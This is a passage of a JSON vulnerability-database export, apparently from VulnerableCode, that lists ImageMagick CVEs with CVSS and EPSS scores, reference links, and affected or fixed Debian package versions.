"vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-16711" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-neaa-39c7-sfbc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49495?format=api", "vulnerability_id": "VCID-nvea-drm5-h3au", "summary": "Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-1115.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-1115.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-1115", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.11975", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12089", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12133", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.11936", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12018", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12072", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12079", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12042", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12014", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.11885", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.11882", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12001", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.11977", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-1115" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3610", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3610" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1115", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1115" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1289", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1289" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1906", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1906" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34151", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34151" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3428", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3428" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5341", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5341" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282", "reference_id": "1013282", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1013282" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2067022", "reference_id": "2067022", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2067022" }, { "reference_url": "https://security.gentoo.org/glsa/202405-02", "reference_id": "GLSA-202405-02", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202405-02" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2022-1115" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nvea-drm5-h3au" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82010?format=api", "vulnerability_id": "VCID-nxfx-jh82-vud3", "summary": "ImageMagick: unsigned offset overflowed at MagickCore/string.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27770.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27770.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27770", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30859", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30986", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.31033", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.3085", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30909", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30939", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30942", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30899", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30854", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30885", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30865", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30831", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00119", "scoring_system": "epss", "scoring_elements": "0.30668", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27770" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27770", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27770" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894691", "reference_id": "1894691", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894691" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/5335-1/", "reference_id": "USN-5335-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5335-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27770" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-nxfx-jh82-vud3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82688?format=api", "vulnerability_id": "VCID-p3vh-b6jn-f3e2", "summary": "ImageMagick: memory leak in SVGKeyValuePairs of coders/svg.c that leads to denial of service via crafted image file", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-10649.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-10649.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00482", "scoring_system": "epss", "scoring_elements": "0.65076", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00482", "scoring_system": "epss", "scoring_elements": "0.65201", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00482", "scoring_system": "epss", "scoring_elements": "0.65194", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00482", "scoring_system": "epss", "scoring_elements": "0.65204", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00482", "scoring_system": "epss", "scoring_elements": "0.65187", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00482", "scoring_system": "epss", "scoring_elements": "0.65126", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00482", "scoring_system": "epss", "scoring_elements": "0.65153", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00482", "scoring_system": "epss", "scoring_elements": "0.65118", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00482", "scoring_system": "epss", "scoring_elements": "0.65168", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00482", "scoring_system": "epss", "scoring_elements": "0.65181", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00482", "scoring_system": "epss", "scoring_elements": "0.65199", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00482", "scoring_system": "epss", "scoring_elements": "0.65186", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00482", "scoring_system": "epss", "scoring_elements": "0.65159", "published_at": "2026-04-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": 